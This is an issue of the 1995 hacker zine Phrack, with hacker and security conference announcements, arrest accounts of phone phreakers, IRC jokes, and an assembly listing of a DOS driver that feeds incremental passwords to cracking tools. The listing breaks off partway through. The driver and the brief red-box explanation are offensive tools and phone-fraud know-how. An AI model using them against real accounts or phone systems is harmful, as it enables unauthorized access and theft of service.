phrack/phrack47/3.txt

1746 lines
56 KiB
Plaintext
Raw Permalink Blame History

This file contains invisible Unicode characters!

This file contains invisible Unicode characters that may be processed differently from what appears below. If your use case is intentional and legitimate, you can safely ignore this warning. Use the Escape button to reveal hidden characters.

==Phrack Magazine==
Volume Six, Issue Forty-Seven, File 3 of 22
// // /\ // ====
// // //\\ // ====
==== // // \\/ ====
/\ // // \\ // /=== ====
//\\ // // // // \=\ ====
// \\/ \\ // // ===/ ====
PART I
------------------------------------------------------------------------------
-----BEGIN PGP SIGNED MESSAGE-----
Phrack Magazine and Computer Security Technologies proudly present:
The 1995 Summer Security Conference
SSSS U U M M M M EEEEE RRRR CCCC OOOO N N
S U U MM MM MM MM E R R C O O NN N
SSS U U M M M M M M M M EEE RRRR C O O N N N
S U U M M M M M M E R R C O O N NN
SSSS UUUU M M M M EEEEE R R CCCC OOOO N N
"SUMMERCON"
June 2-4 1995 @ the Downtown Clarion Hotel in Atlanta, Georgia
This is the official announcement and open invitation to the 1995
incarnation of Summercon. In the past, Summercon was an invite-only
hacker gathering held annually in St. Louis, Missouri. Starting
with this incarnation, Summercon is open to any and all interested
parties: Hackers, Phreaks, Pirates, Virus Writers, System Administrators,
Law Enforcement Officials, Neo-Hippies, Secret Agents, Teachers,
Disgruntled Employees, Telco Flunkies, Journalists, New Yorkers,
Programmers, Conspiracy Nuts, Musicians and Nudists.
LOCATION:
The Clarion Hotel is located in downtown Atlanta, 9 miles from
Hartsfield International Airport and just a few blocks from the
Peachtree Center MARTA Station.
Considering the exorbitant expenses involved with attending other
conferences of this type, Rooms at Summercon are reduced to
$65 per night for Single or Double Occupancy
The Clarion Hotel Downtown, Courtland at 70 Houston St., NE,
Atlanta, GA 30303
(404) 659-2660 or (800) 241-3828 (404) 524-5390 (fax)
No one likes to pay a hundred dollars a night. We don't expect you
to have to. Spend your money on room service, drinks in the hotel bar,
or on k-rad hacker t-shirts. Remember: Mention that you are attending
Summercon in order to receive the discount.
DIRECTIONS
75/85 Southbound - Exit 97 (Courtland). Go 3 blocks south on Courtland
then turn left on Houston (John Wesley Dobbs Ave.)
20 East - Exit 75/85 North at International. Turn Left on Courtland at
Houston Ave. NE. (aka. John Wesley Dobbs Ave. NE.)
20 West - Exit 75/85 North at International. One block to Courtland
and right at Houston Ave. NE. (John Wesley Dobbs Ave. NE.)
Atlanta Airport Shuttle - The Express Bus that leaves from Atlanta's
International Airport will drop you off at many hotels in the downtown
area, including the Clarion. The shuttle should be no more than 12
dollars. Fares may be paid at the Airport Shuttle in the Ground
Transportation area of the Airport Terminal.
MARTA - The Metropolitan Atlanta Rapid Transit Authority (MARTA), is a
convenient and inexpensive way to negotiate most of the Atlanta area.
Take the MARTA train from the Airport to the Peach Tree Center Station.
Walk three blocks down Houston to the intersection of Houston and
Courtland. The MARTA fare will be roughly 2 dollars.
Taxis - The average cab fare from Atlanta's Airport to the downtown area
is roughly 30 dollars.
CONFERENCE INFO
It has always been our contention that cons are for socializing.
"Seekret Hacker InPh0" is never really discussed except in private
circles, so the only way anyone is going to get any is to meet new people
and take the initiative to start interesting conversations.
Because of this, the formal speaking portion of Summercon will be
held on one day, not two or three, leaving plenty of time for people
to explore the city, compare hacking techniques, or go trashing and
clubbing with their heretofore unseen online companions.
The "Conference" will be held on June 3rd from roughly 11:00 am until
6:00 pm with a 1 hour lunch break from 1:00 to 2:00.
NO VIDEO TAPING WILL BE ALLOWED IN THE CONFERENCE ROOM. Audio Taping
and still photography will be permitted.
CURRENT LIST OF SPEAKERS:
Robert Steele - Ex-Intelligence Agent, Founder and CEO of Open Source
Solutions (a private sector intelligence firm)
Topic: Hackers from the Intelligence Perspective
Winn Schwartau - Author of "Information Warfare" and "Terminal Compromise",
Publisher of Security Insider Report, and noted security
expert
Topic: Electromagnetic Weaponry
Bob Stratton - Information Security Expert from one of America's largest
Internet service providers
Topic: The Future of TCP/IP Security
Eric Hughes - Cryptography Expert and founding member of the "Cypherpunks"
Topic: Cryptography, Banking, and Commerce
Annaliza Savage - London-based Director/Producer
Topic: Discussion of her documentary "Unauthorized Access"
(Followed by a public screening of the film)
Chris Goggans - Editor of Phrack Magazine and Summercon M.C.
Topic: introductions, incidentals and a topic which is sure
to culminate in an international incident.
(Other Speakers May Be Added - Interested parties may contact scon@fc.net)
COSTS
Since other cons of this type have been charging from 25 to 40 dollars
entry fees, we are only charging 10 dollars. Yes, that's correct,
TEN (10) dollars in US currency. Money is far too scarce among the
hacker community to fleece everyone for money they will probably need
to eat with or pay for their hotel rooms.
WHAT TO DO IN ATLANTA:
To attempt to make everyone's stay in Atlanta more exciting, we are
contacting local establishments to arrange for special discounts and/or
price reductions for Summercon attendees. Information will be handed
out regarding these arrangements at the conference.
Atlanta is a happening town.
Touristy Stuff Party Time
The World of Coca-Cola Buckhead
Underground Atlanta The Gold Club
Georgia Dome (Baseball?) (Countless Other Clubs and Bars)
Six Flags
CONTACTING SUMMERCON SPONSORS
You can contact the Summercon sponsors by several means:
E-mail: scon@fc.net
WWW: http://www.fc.net/scon.html
Snail Mail: Phrack Magazine
603 W. 13th #1A-278
Austin, TX 78701
If deemed severely urgent, you can PGP your email with the following PGP
key:
- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6
mQCNAizMHvgAAAEEAJuIW5snS6e567/34+nkSA9cn2BHFIJLfBm3m0EYHFLB0wEP
Y/CIJ5NfcP00R+7AteFgFIhu9NrKNJtrq0ZMAOmiqUWkSzSRLpwecFso8QvBB+yk
Dk9BF57GftqM5zesJHqO9hjUlVlnRqYFT49vcMFTvT7krR9Gj6R4oxgb1CldAAUR
tBRwaHJhY2tAd2VsbC5zZi5jYS51cw==
=evjv
- -----END PGP PUBLIC KEY BLOCK-----
See you in Atlanta!
-----BEGIN PGP SIGNATURE-----
Version: 2.6
iQCVAwUBL4mMEaR4oxgb1CldAQE5dQP+ItUraBw4D/3p6UxjY/V8CO807qXXH6U4
46ITHnRJXWfEDRAp1jwl+lyavoo+d5AJPSVeeFt10yzVDEOb258oEZkIkciBnr7q
mUu563/Qq67gBsOWYP7sLdu3KEgedcggkzxtUzPxoVRVZYkHWKKjkG1t7LiT3gQ5
uRix2FrftCY=
=m/Yt
-----END PGP SIGNATURE-----
------------------------------------------------------------------------------
UNAUTHORIZED ACCESS
"Unauthorized Access [is] a documentary that tells the story of the
computer underground from our side, it captures the hacker world
from Hamburg to Los Angeles and virtually everywhere in between."
2600 The Hacker Quarterly
Computers are becoming an integral part of our everyday existence.
They are used to store and send a multitude of information, from
credit reports and bank withdrawals, to personal letters and highly
sensitive military documents. So how secure are our computer
systems?
The computer hacker is an expert at infiltrating secured systems,
such as those at AT&T, TRW, NASA or the DMV. Most computer systems
that have a telephone connection have been under siege at one time
or another, many without their owner's knowledge. The really good
hackers can reroute the telephone systems, obtain highly sensitive
corporate and government documents, download individual's credit
reports, make free phone calls globally, read private electronic
mail and corporate bulletins and get away without ever leaving a
trace.
So who are these hackers? Just exactly WHAT do they do and WHY do
they do it? Are they really a threat? What do they DO with the
information that they obtain? What are the consequences of their
actions? Are hackers simply playing an intellectual game of chess
or are hackers using technology to fight back and take control of
a bureaucratic system that has previously appeared indestructible?
Unauthorized Access is a documentary that demistifies the hype and
propaganda surrounding the computer hacker. Shot in 15 cities
and 4 countries, the film hopes to expose the truths of this subculture
focusing on the hackers themselves.
Unauthorized Access is a view from inside the global underground.
For a PAL (European) copy send a cheque/postal order for 15 British
Pounds or $25 for NTSC (American) standard to:
Savage Productions
Suite One
281 City Road
London EC1V 1LA
------------------------------------------------------------------------------
ACCESS ALL AREAS
Hacking Conference
1st - 2nd July, 1995
(Saturday & Sunday)
King's College, London, UK
-------------------------------WHAT-IT-IS---------------------------------
The first UK hacking conference, Access All Areas, is to be run in London
later this year. It is aimed at hackers, phone phreaks, computer security
professionals, cyberpunks, law enforcement officials, net surfers,
programmers, and the computer underground.
It will be a chance for all sides of the computer world to get together,
discuss major issues, learn new tricks, educate others and meet "The
Enemy".
-------------------------------WHERE-IT-IS--------------------------------
Access All Areas is to be held during the first weekend of July, 1995 at
King's College, London. King's College is located in central London on
The Strand and is one of the premier universities in England.
-----------------------------WHAT-WILL-HAPPEN-----------------------------
There will be a large lecture theatre that will be used for talks by
computer security professionals, legal experts and hackers alike. The
topics under discussion will include hacking, phreaking, big brother and
the secret services, biometrics, cellular telephones, pagers, magstrips,
smart card technology, social engineering, Unix security risks, viruses,
legal aspects and much, much more.
Technical workshops will be running throughout the conference on several
topics listed above.
A video room, equipped with multiple large screen televisions, will be
showing various films, documentaries and other hacker related footage.
The conference facilities will also include a 10Mbps Internet link
connected to a local area network with various computers hanging off of it
and with extra ports to connect your laptop to.
------------------------------REGISTRATION--------------------------------
Registration will take place on the morning of Saturday 1st July from
9:00am until 12:00 noon, when the conference will commence. Lectures and
workshops will run until late Saturday night and will continue on Sunday
2nd July from 9:00am until 6:00pm.
----------------------------------COST------------------------------------
The price of admission will be 25.00 British pounds (approximately US $40.00)
at the door and will include a door pass and conference programme.
-----------------------------ACCOMMODATION--------------------------------
Accommodation in university halls of residence is being offered for the
duration of the conference. All prices quoted are per person, per night
and include full English breakfast. (In British pounds)
SINGLE TWIN
WELLINGTON HALL 22.00 16.75
Special prices for British and Overseas university students, holding
current student identification, are also available - please call King's
Campus Vacation Bureau for details.
All bookings must be made directly with the university. They accept
payment by cash, cheque and credit card.
To making a booking call the following numbers...
KING'S CAMPUS VACATION BUREAU
Telephone : +44 (0)171 351 6011
Fax : +44 (0)171 352 7376
----------------------------MORE-INFORMATION------------------------------
If you would like more information about Access All Areas, including
pre-registration details then please contact one of the following...
Telephone : +44 (0)973 500202
Fax : +44 (0)181 224 0547
Email : info@phate.demon.co.uk
------------------------------------------------------------------------------
D I S T R I B U T E W I D E L Y
*****FIRST CALL FOR PAPERS*****
InfoWarCon '95
A 2 Day International Symposium
on Information Warfare
September 7-8, 1995
Stouffer Concourse Hotel
Arlington, VA
Presented by:
National Computer Security Association
Winn Schwartau and Interpact, Inc.
Robert Steele and OSS, Inc.
CONFERENCE OVERVIEW:
The Information Warfare Conference (InfoWarCon) is our third
international conference dedicated to the exchange of ideas,
policies, tactics, weapons, methodologies and defensive posture
of Information Warfare on a local, national, and global basis.
InfoWarCon will bring together international experts from a broad
range of disciplines to discuss and integrate concepts in this
rapidly evolving field. Attendees will intensely interact with
the speakers and presenters as well as each other to increase
each other's understanding of the interrelatedness of the topics.
While there are many interpretations of Information Warfare by
different groups, the current working definition we employ is:
Information Warfare is the use of information and informa
tion systems as weapons in a conflict where information and
information systems are the targets.
Information Warfare is broken down into three categories, and
InfoWarCon speakers and attendees will interactively examine them
all:
Class I: Personal Privacy. "In Cyberspace You Are Guilty
Until Proven Innocent." The mass psychology of information.
Privacy versus stability and law enforcement.
Class II: Industrial and Economic Espionage. Domestic and
international ramifications and postures in a globally
networked, competitive society.
Class III: Global Information Warfare. Nation-state versus
Nation-state as an alternative to convention warfare, the
military perspective and terrorism.
THE CONFERENCE
The conference is designed to be interactive - with extensive
interaction between all participants. The preliminary contents
and discussions will focus on:
- What is Information Warfare?
- What Are the Targets?
- Protecting the Global Financial Infrastructure
- Military Perspectives on InfoWar
- InfoWar Vs. Non-Lethal Warfare
- Defending the U.S. Infrastructure
- The Intelligence Community and Information
- Open Source Intelligence
- The Psychology of Information
- Privacy Balances
- Information As the Competitive Edge
- International Cooperation
- Denial of Service
- Cyber-Terrorism
- Offensive Terrorism
- Offensive InfoWar Techniques
- Defensive InfoWar Postures
- Education and Awareness Training
- Corporate Policy
- Government Policy
- Global Policy
- Espionage
- Export Controls of Information Flow
- The Legal Perspective
- The New Information Warriors
Plenary sessions will accommodate all attendees, while break-out
sessions will provide more intimate presentations and interactiv
ity on topics of specific interests.
SUBMISSIONS:
Submission for papers are now be accepted. We are looking for
excellent speakers and presenters with new and novel concepts of
Information Warfare. You may submit papers on the topics listed
above, or on others of interest to you, your company or govern
ment.
We welcome innovative thought from the private sector, the gov
ernment (civilian, military and intelligence) and the interna
tional community. Submissions must be received by May 1, 1995,
and notification of acceptance will occur by June 1, 1995.
Please submit 2-3 page presentation outlines to:
winn@infowar.com.
All submissions and the contents of InfoWarCon '95 will be in
English. If you must submit a hard copy: Fax: 813.393.6361 or
snail mail to: Interpact, Inc. 11511 Pine St., Seminole, FL
34642
All submissions and presentation should be unclassified, as they
will become Open Source upon submission and/or acceptance.
SPONSORS:
The Information Warfare Symposium is currently choosing sponsors
for various functions.
Continental Breakfast, Day 1 and Day 2
Morning Coffee Break, Day 1 and Day 2
Lunch, Day 1 and Day 2
Afternoon Coffee Break, Day 1 and Day 2
Cocktail Party, Day 1
Each Corporate or Organizational sponsor will be included in all
promotional materials and Symposium function. For more infor-
mation, contact Paul Gates at the NCSA. Voice: 717.258.1816 or
email: 747774.1326@Compuserve.com.
EXHIBITS:
Limited space is available for table-top displays for commercial
or governmental products, services, educational or other promo
tion. For further information, contact Paul Gates at the National
Computer Security Association. 717.258.1816
REGISTRATION:
Payment made BEFORE July 1, 1995:
( ) $445.00 NCSA Member/OSS Attendee
( ) $545.00 All others
Payment made AFTER July 1, 1995:
( ) $495.00 NCSA Members/OSS Attendees
( ) $595.00 All others
( ) I'M INTERESTED, but would like more information sent to the
address above. Please include a free copy of your 32 page
"Information Security Resource Catalog".
( ) I'd like to know more about NCSA on-site training, security
audits and consulting services. Please have someone give me
a call.
MAIL OR FAX TO:
National Computer Security Association
10 South Courthouse Avenue
Carlisle, PA 17013
Phone 717-258-1816 or FAX 717-243-8642
EMAIL: 74774.1326@compuserve.com
CompuServe: GO NCSAFORUM
Winn Schwartau Interpact, Inc.
Information Security & Warfare
V:813.393.6600 F:813.393.6361
Email: Winn@Infowar.Com
------------------------------------------------------------------------------
Ed Cummings, also known to many in cyberspace as "Bernie S" was arrested
on March 13th, 1995 for 2 misdemeanors of possession, manufacture and sale
of a device to commit Telecommunications fraud charges. He is being held in
Delaware County Prison in lieu of $100,000.00 Bail. His story follows.
On the evening of the 13th Bernie S. received a page from his mail drop.
Some people he knew from Florida had stopped in at his mail drop thinking
it was his address. They were looking to purchase several 6.5 Mhz Crystals.
These crystals when used to replace the standard crystal in the RADIO SHACK
Hand Telephone dialer, and with some programming, produce tones that trick
pay phones into believing they have received coins. These are commonly
referred to as "red boxes" and got their name from an actual red box pulled
from a pay phone in the late seventies by some curious person.
Ed Cummings met these people at a local 7-11 (which 7-11?) where he was
to sell the widely used electronic timing crystals for roughly $4 a piece.
The purchaser only had two twenty dollar bills and Ed Cummings no change.
Ed Cummings went into the 7-11 to get some change to make the transaction.
A police officer noticed a van parked in the parking lot of the 7-11 with
more several African Americans inside. As Ed was leaving the 7-11 he noticed
fifteen police cars pulling into the parking lot of the 7-11.
Next thing he knew the police were asking him if they could `rifle`
through his car. He said no. Moments later as he was talking to a Detective
and noticed another police officer going through his car. He asked the officer
to stop. They did not, in all the police confiscated a few hundred 6.5Mhz
crystals (which he resells for roughly $4 a piece) and a large box of 100
dialers. The police told him they would get back to him, and he could have
his electronics back if the contents of the bag were legal. In the contents
of the seized items was one modified dialer, that a customer returned after
modification explaining that it did not work, a broken red box.
The next day Ed `Bernie S.` Cummings was over at a friend`s house working
on their computer when eight to ten plain clothed armed men burst into the
house and ordered him and his friends to freeze. They cuffed him and took him
to a holding cell (what jail?). There he was left without a blanket or jacket
to sleep with in the cold cell.
That evening the Secret Service had been called in when someone figured
out what the dialers and crystals would do when put together. The
United States Secret Service found his home and entered it, while they were
questioning him.
The next morning at his arraignment he was finally told of the charges
he was being held upon. They were Two misdemeanor Charges of manufacture,
Distribution and Sale of devices of Telecommunications Fraud. and Two Unlawful
use of a computer charges. His bail was automatically set to $100,000.00
because Ed Cummings refused talk with the police without his attorney present.
The Secret Service presented to the judge a 9 page inventory of what
they had found in his home. On that inventory there 14 computers. 2 printers.
more Boxes of bios chips for the systems he worked with. Eprom burners which
the Federal Agents had labeled "Cellular telephone chip reprogramming adapters"
Eproms are used in everything from Automobile computers to personal computers.
They also confiscated his toolbox of screw drivers, wire clippers and other
computer oriented tools he used for his consulting job.
The Judge dropped the Two unlawful use of a computer charges due to
the fact that the evidence was circumstantial and the county had no actual
evidence that Ed had ever used the computers in question.
As of 3/27/1995 Ed Cummings is still in Delaware County Prison
awaiting his trial. His trial has not yet been scheduled and Ed will most
likely not raise the One Hundred Thousand Dollars needed to be released on
bail.
------------------------------------------------------------------------------
"Don't believe the hype." - Public Enemy, 1988
This file's purpose is to clear up any misconceptions about the recent
situation that has come upon the sociopolitical group known as KoV.
As it stands now, (10:55 PM EST on 1/29/95), NO ONE has been busted for
ANYTHING. We have received several tip-offs from private sources regarding
a supposed "FBI investigation" of our group that is purported to be active
at this very minute. However, with the exception of a few VERY suspicious
incidents and coincidences, there has been NO HARD EVIDENCE thus far about
ANYONE getting busted for ANYTHING. So while we are EXTREMELY concerned for
the integrity of our innocence, we must stress that nothing has gone down.
Yet.
We have very good reason to believe that a few of those among us are about
to be charged with various false accusations by a local university. However
the current mental state of the person in charge of this charade is also in
question. Therefore it would be logical to assume nothing. The conflicting
tip-offs, rumors, warnings and threats that we have received make it even
more difficult to get a clear picture of exactly what is going on. We have
heard so many things from so many different sources, both credible and
questionable, that we would be hard-pressed to give an accurate evaluation
of the current state of things.
What we can say for sure, however, is that KoV officially died on Monday,
January 23, 1995, along with its communications network, KoVNet. This
promises to be a great loss to the open-minded and sociopolitical community
as well as the free-thinkers and activists who supported us so generously.
Our reasons for disbanding the group were many, but the foremost was in
light of the current situation we are facing.
Consider this last obstacle our final, stalwart stand against the evils of
AmeriKKKan government and its various greedy, capitalistic agencies.
From the moment of KoV's conception, they have publicly sought to destroy
us; to silence our questioning of authority, to oppress our free-thinking
minds, and to close off our intellectual channels of communication. They
have even gone so far as to stalk us in public places. 'Tis a shame indeed.
If you have any questions or if you wish to contact us for any reason,
you may email sgolem@pcnet.com with the subject or header of "ATTN: KoV".
I will try to post further updates of this saga to CiPNet, ThrashNet,
QuantumNet, InsanityNet, ScumNet, FizzNet, NukeNet and any others I can.
We would appreciate any support that other h/p, art or political groups can
lend us. Until then, my friends...
-Lord Valgamon, Malicious Intent, Onslaught, Leland Gaunt & the rest of KoV
------------------------------------------------------------------------------
What happens when you are caught beige boxing.
by Rush 2
Yeah yeah, I'm the only one. But here is a generally interesting
description of everything to getting caught to arraignment.
Well about 5 months ago i needed to set up a conference really quick..
it was about 12:00 (never knew there was a 10:00 pm curfew in that area)
and went to a 25 pair box at this local strip mall. Well I was out there
the box was already open and I was just about to start testing pairs to
see which was connected and what wasn't.
All of a sudden, i hear this loud screeching sound of a car coming
to a skid from doing about 90mph. I turned and saw that typically dirty
squad car about to hit me.. you know the car, mud and dust on the tires
and body, coffee and smudge marks all over the windshield. i got on my
bike and started to run. Now the thing is I COULD have gotten away.. the
pathetic excuse for a cop had run not more than 10 yards after me and
decided that I was a threat so he pulled his handgun and yelled. I saw
this and thought it would be wiser to stop than get shot.
Within 2 minutes at LEAST 10 squad cars had come to his aide.. i did
not know i was less than a half mile from a police station and they were
looking for a prowler in the general area. The police did the normal,
called me scum, asked me what i was doing, searched me until they were
satisfied... than picked me up and threw me in the car... the funny
thing was they didn't see my phone until they threw me into the back seat
and the cord fell out.. (they never saw the page of notes and 'naughty'
material in my pocket though it was about 4 inches thick and sticking out
that a blind man could see it.
Well they got me to the station and pried my info out, and called my
father... I came up with a good enough story about some made up user
who told me to go across the street and plug in.. then I was told I
would be dealt with in the next week... I did not receive anything for
three and a half months.
Once the time came for the arraignment (for a juvenile they called it
an intake). I got to go to the police station, sit for about 3 hours (as
if i thought they would be on time) until I waited for my probation
officer. Finally she got there and we proceeded to talk. She explained
all of the charges and my lawyer (interesting guy) laughed, I was being
charged with prowling (could be disputed I was on a public sidewalk and
there in that strip mall is a 24 hr laundry mat), loitering (again that
could be disputed), and attempted theft of services (though I NEVER even
plugged in).
After this was all said i spent the next hour talking with the lady
in private. I immediately found she had an interest in computers and was
having a problem with her home pc. So I easily changed the topic to my
fascination in computers and solved her problem with her computer, and
answered at least 50 questions about them. In the last 10-15 minutes of
the conversation all i could get from her were statements about how
impressed and how intrigued she was with me. She ended up giving me a
look (that was hard to judge but i am staying away from this chick) that
was either confusion or attraction, slipped me a card with her home phone
number and name and called back in my lawyer and parents.
Once they got back in, all that she really said was I was a great boy,
that she would like to see me do more with my time besides computers, and
that she was taking my sentence of 12 months formal probation with 300
hours of community service to 3 months of informal probation with 30
hours of community service. That and she said bell was asking her what
to do and she would tell them that it was a non issue since I did not
plug in and even if I had it would not be their concern unless I had
plugged in to the telco access part of the network interface.
Well I have yet to receive official record of having to perform
the community service or the probation but I called my probation officer
yesterday and said she wasn't putting the community service into the
punishment and it has been an equivalent amount of time to just say that
since I haven't gotten in trouble since she will count the probation as
already served. Luckily she based all other needs of me on the report
from a teacher, and with my luck she picked the one teacher, my computers
teacher, that no matter what I did or said would lie and say I didn't.
Thanks to erikb for publishing this, and greets to CXrank, paradox,
dark phiber, the fat cop (who spilled his coffee and box of donuts
coming after me) that made this all possible, and to everyone else.
-rush 2
http://www-bprc.mps.ohio-state.edu/cgi-bin/hpp/Rush_2.html
Look for My site, unforeseen danger soon to be on a 28.8 slip
and by the end of the summer on a 500k slip connect.
------------------------------------------------------------------------------
[Something found on IRC]
Danny Partridge Emmanuel Goldstein
(AKA Danny Bonaduce: (AKA Eric Corley:
a child star from the child-like publisher
"The Partridge Family" of 26oo magazine.
---------------------- ------------------
Hosts a boring local Hosts a boring local
radio program. radio program.
Quasi Celebrity Quasi Celebrity
Status among Status among
70's freaks telephone phreaks
Periods of Heavy Periods of Heavy
Drug Usage Drug Usage
Involved in Sex Involved in Sex
Scandal with Scandal with
another man another man
Last name is Friends with Phiber
"Bonaduce" Optik whose first
handle was "Il Duce"
Supplements incoming Supplements incoming
by doing desperate by doing desperate
local talk shows local talk shows
whenever he can. whenever he can.
------------------------------------------------------------------------------
Top 10 #hack fights that would be the coolest to see.
(And no, Ophie's not in it twice just because she's a girl...)
===========================================================================
10.) The D.C. Convention Center is Proud to Present: Hot-Oil Wrestling
featuring KL & TK.
9.) Ludichrist vs. GFM, to be resolved at the next convention, or, uh, the
one after that... or, uh...
8.) C-Curve and Elite Entity, "Who's who?"
7.) Ben Camp vs. Ben Sherman, "Particles of Novocain Everywhere."
(Or: "I'm totally numb, let me hug you!!!")
6.) Dan Farmer and Pete Shipley: "Whips vs. Chains"
5.) Grayarea vs. Netcom "No, *I* want root..."
4.) WWF Wrestling with Len and |al|.
3.) Ophie vs. Voyager, "Night of the Living Dead."
2.) Okinawa vs. Gail Thackery, "The Winner Gets Okinawa's Testicle."
and the number one #hack fight is
1.) Ophie vs. all the #hack guys, "10 Bucks on the Girl"
------------------------------------------------------------------------------
P A S S W O R D E N G I N E (for IBM PC's) by Uncle Armpit
+++++++++++++++++++++++++++++++++++++++++++++
The device driver code listed below provides a data stream of passwords.
The device driver approach was used to speed up the process
of cracking passwords on an incremental basis. The usual approach was
to generate the passwords to a file, then reading the file, etc..the device
driver approach circumvents these file storage problems, and others, such as
having enough free disk space and delays from disk i/o.
This driver operates completely in memory (approx. 0.5Kb)
How practical is this?
----------------------
This program would be very useful if you think you may know what strategy
the user/admin uses for picking out their passwords. Without eliciting some
sort of a strategy, forget it-- unless your desperate enough!!
A "strategy" could consist of any of these possible advantages--
1) default passwords (ie: SIN, student #, birth date, phone number...)
2) the mutation of a lUSERs' known password from another system
3) viewing the mark typing in most of their password with a couple
of unseen characters
4) etc...
---------------------------
With the sample device driver provided, passwords starting at
'aaaaaaa' and ending with 'zzzzzzz' will be generated. The length
of the password string can be modified by changing the length of
the password string itself (that is, the variable "number"). The
range of characters in the passwords can also be changed by
modifying the following two lines:
;hackdrv.sys
;.
;.
;
for ending character--
cmp byte ptr [number+si],'z'+1 ;+1 past ending char. in range
...and for starting character
cmp byte ptr [number+si],'a' ;starting char. in range
;
;----------------------
for instance, if you wished to generate numbers from "0000000" to
"9999999"
-change the ending character to:
cmp byte ptr [number+si],'9'+1
-starting character to:
cmp byte ptr [number+si],'0'
and "number" variable from 'aaaaaa' to '0000000' and then
recompile..
-----
..or in the third case, if u had observed a lUSER type in most of
their password, you may want to rewrite the code to limit the
search. IE: limit the keys to a certain quadrant of the keyboard.
Modify the code starting at "reiterate:" and ending at "inc_num
endp" for this.
=================================================================
/'nuff of this!/ How do I get things working?
-----------------------------------------------
Compile the device driver "hackdrv.sys", and the second program,
"modpwd.asm". Then specify the device driver inside config.sys
(ie: "c:\hackdrv.sys"). The code below was compiled with the a86
compiler, v3.03. Some modifications might be needed to work with
other compilers.
To use it in prgs like crackerjack, type in the following on the
command line:
c:\>jack -pwfile:<your password file here!> -word:hackpwd
------
If you had stopped a cracker program (eg: crackerjack) and want to
pick up from where you left off, run the program "modpwd.com".
This program can change HACKDRVs password through-
a) a command line argument (ie: "modpwd aabbbbe")
b) executing the program with no parameters (this method also
displays the current password in memory)
Happy Hacking,
Uncle Armpit
;-----------------------cut here--------------------------------
;Program HACKDRV.SYS
;
org 0h
next_dev dd -1
attribute dw 0c000h ;character device w/ ioctl calls
strategy dw dev_strategy
interrupt dw dev_int
dev_name db 'HACKPWD '
countr dw offset number
number db 'aaaaaa',0ah ;<----six characters, lower case
numsize equ $-number - 2
afternum:
;working space for device driver
rh_ofs dw ?
rh_seg dw ?
dev_strategy: ;strategy routine
mov cs:rh_seg,es
mov cs:rh_ofs,bx
retf
dev_int: ;interrupt routine
pushf
push ds
push es
push ax
push bx
push cx
push dx
push di
push si
cld
push cs
pop ds
mov bx,cs:rh_seg
mov es,bx
mov bx,cs:rh_ofs
mov al,es:[bx]+2
rol al,1
mov di,offset cmdtab
xor ah,ah
add di,ax
jmp word ptr[di]
cmdtab: ;command table
dw init ;0
dw exit3 ;1
dw exit3 ;2
dw ioctl_read ;3
dw do_read ;4
dw exit3 ;5
dw exit3 ;6
dw exit3 ;7
dw exit3 ;8
dw exit3 ;9
dw exit3 ;10
dw exit3 ;11
dw ioctl_write ;12
dw exit3 ;13
dw 5 dup (offset exit3)
ioctl_read:
push es
push bx
mov si,es:[bx+10h]
mov di,es:[bx+0eh]
mov es,si
push cs
pop ds
mov si,offset number
xor cx,cx
get_char:
lodsb
stosb
inc cl
cmp al,0ah
jz ioctl_rend
jmp get_char
ioctl_rend:
pop bx
pop es
mov es:[bx+012h],cx
mov cs:countr,offset number
jmp exit2
ioctl_write:
push es
push bx
mov si,es:[bx+010h]
mov ds,si
mov si,es:[bx+0eh]
mov cx,numsize+1 ;es:[bx+012h]
push cs
pop es
mov di,offset number
repe movsb
pop es
pop bx
mov cs:countr,offset number
jmp exit2
do_read:
push es
push bx
push cs
pop ds
mov si,[countr]
inc si ;word ptr [countr]
cmp si,offset afternum
jnz is_okay
mov si,offset number
call inc_num
is_okay:
mov [countr],si
mov di,es:[bx]+0eh
mov ax,es:[bx]+010h
mov cx, es:[bx]+012h
jcxz clean_up
mov es,ax
repe movsb
clean_up:
pop bx
pop es
jmp exit2
exit3: mov es:word ptr 3[bx],08103h
jmp exit1
exit2:
mov es:word ptr 3[bx],0100h
exit1:
pop si
pop di
pop dx
pop cx
pop bx
pop ax
pop es
pop ds
popf
retf
exit:
inc_num proc near
push si
mov si,numsize
reiterate:
inc byte ptr [number+si]
cmp byte ptr [number+si],'z'+1 ;+1 past ending char. in range
jnz _exit
mov byte ptr [number+si],'a' ;starting char. in range
dec si
cmp si,-1
jnz reiterate
mov byte ptr [number],01ah ;send EOF
_exit:
pop si
ret
inc_num endp
at_eof: ; the non-resident code starts here
initial proc near
push es
push cs
pop ds
push cs
pop es
mov si,offset number
mov di,offset tmpnum
cld
_again:
lodsb
cmp al,0ah
jz _nomorechars
stosb
jmp _again
_nomorechars:
mov si,offset msgend
mov cx,4
repe movsb
mov ah,09 ;print welcome message
mov dx,offset msg1
int 21h
pop es
ret
initial endp
init: call initial
mov ax,offset at_eof
mov es:[bx]+0eh,ax
push cs
pop ax
mov es:[bx]+010h,ax
mov cs:word ptr cmdtab,offset exit3
jmp exit2
msg1 db "Incremental Password Generator (c)1995",0ah,0dh
db "Written by Uncle Armpit",0ah,0dh,0ah,0dh
db "Starting at word ["
tmpnum db 10 dup (?)
msgend db "]",0a,0d,'$'
;END hackdrv.sys
;------------------------------cut here----------------------------------
;PROGRAM modpwd.asm
;
org 0100h
mov ax,03d02h
xor cx,cx
mov dx,offset devname
int 21h
jnc drvr_found
mov ah,09
mov dx,offset no_drvr
int 21h
jmp error_pass
drvr_found:
mov bx,ax
mov ax,04402h
mov cx,20 ;read 20 characters
mov dx,offset databuffr
int 21h
mov pass_len,al
dec al
mov ah,al
and al,0fh
mov cl,4
shr ah,cl
add ax,03030h
cmp al,'9'
jbe inrange
add al,7
inrange:
cmp ah,'9'
jbe inrange1
add ah,7
inrange1:
mov byte ptr [num_chr],ah
mov byte ptr [num_chr+1],al
cld
mov di,offset databuffr-1
xor cx,cx
mov cl,pass_len
add di,cx
mov si,offset pass_end
mov cx,stringsz
repe movsb
;check for information in command line
;else--> prompt for user input
mov al,pass_len
or byte ptr [0080h],0
jz req_input
mov cl,[0080h]
dec cl
mov [0081h],cl
mov si,0081h
mov di,offset newpass
mov cx,20
repe movsb
jmp vrfy_info
req_input:
mov ah,09
mov dx,offset cur_pass
int 21h
mov ah,0a
mov dx,offset pass_len
int 21h
vrfy_info:
mov ax,word ptr [pass_len]
cmp ah,0
jz error_pass
dec al
cmp ah,al
jnz error_len
;change the current password
xor cx,cx
mov cl,al
mov ah,044h
mov al,03
mov dx,offset newpass+1
int 21h
jnc success_pass
error_len:
mov ah,09
mov dx,offset errormsg
int 21h
error_pass:
